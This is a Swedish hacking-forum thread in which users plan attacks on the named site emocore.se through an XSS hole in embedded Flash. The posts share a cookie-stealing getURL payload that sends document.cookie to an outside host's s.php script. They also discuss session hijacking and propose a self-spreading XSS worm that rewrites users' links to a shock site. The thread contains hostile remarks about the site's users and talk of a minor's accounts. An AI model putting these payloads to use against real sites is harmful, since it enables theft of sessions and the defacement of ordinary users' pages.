Emocore.se

Hihi, såja.

Dragit upp en lite flash med XSS i.
Verkar dock som att det inte går att hijacka sessionsen, hur gör man för att komma förbi detta? Funkar inte att ändra sessionen bara.. Utloggad direkt....

usch och blä, borde vara lag på sådana sidor

Hur ser ditt actionscript ut i .fla'n?
Jag kikade själv på sendToURL samt några .swf-exploits men fick ingen rätsida på det.

Kollade igenom kakorna också.
Hittade PHPSESSID (dooh, såklart) samt ps-uid men jag har inte fått ut något av värde ur dom.

Det stämmer bra, fick ett mail från en av kodarna imorse, där han tackade för tråden. p0ng och han verkar för övrigt vara vänner, baserat på att de vet varandras förnamn och har kontakt över msn, om inte mer.

Med detta i åtanke ber jag nu mod att flytta denna tråd till avancerad datasäkerhet.

EDIT: Den i crew som tackat för tråden är faktiskt medlem på fb, men fyller ännu inte kraven för avancerad datasäkerhet. p0ng har skrivit en del av hans nick tidigare i tråden, om ni undrar vem det är.

Japp, jag känner Jine, vi är dock inte bästa vänner.
Han har varit medlem på FB innan, men fick tydligen inte vara med och leka här längre.

Personligen så hatar jag dendär sidan, och alla jävla emos.

Fyller bara på med lite information..
getURL fungerar ju med inline javascript.. så om man skulle dra en radda med js-funktioner som.. ändrade sidans utseende.. och kanske gjorde om alla anchor-element till länkar till on.nimp.org skulle funka..

Jag vet ju inte om det här skulle funka, men man borde väl kunna ändra andras pres-ar genom js-et.. så deras sida också visar skiten.. och allt sprids som en trevlig xss-mask..

<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/SASjlj5R4U4&hl=en"></param><param name="wmode" value="transparent"></param><embed src="http://data.fuskbugg.se/skalman01/-test.swf" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>

Funkar för övrigt om man vill embedda något, dock lyckades jag inte få till det med xssen..

Ett av hans tre konton är avstängt, de två andra är inte det.
Att han fortfarande inte är 18, borde ju medföra en avstängning även på de andra två.

Men nog med OfT, nu försöker vi hålla oss till tråden.

EDIT: Tog bort länkarna till de konton som åsyftades.

Jag har en getUrl("javascript:location.href='http://www.abc.com/s.php?c='+document.cookie;")

Fick det dock inte att fungera och orkade inte lägga ner allt för mycket tid på det

Att det går att embeda andra flashfiler än youtube-klipp är redan nämnt, däremot skriver man inte koden du angav eftersom dom ersätter < och >

Vill man ha med swf-filen du nämnde i ditt inlägg får man skriva:


Koden du skrev är ju resultatet som webbservern parsar ut till klienten.

Jag är inte säker på att det faktiskt fungerar att hämta cookies via xss/javascript med getURL i flash.

Den exploiten upptäcktes runt 2002 (om jag inte minns fel) och jag vette fan om det finns något nytt sätt att göra det på efter att ursprungsexploiten patchades.

p0ng skrev att han hade lyckats snatta cookies via en cookielogger i en flashfil han har däremot inte valt att tala om hur så antingen vill han att vi ska lära oss själva eller så ljuger han när han säger att han gjort det.

Jag hoppas på det förstnämnda.

Hihi, ni har lyckats Siten är nere.
vart orsaken (Klicka inte)

Jasså du?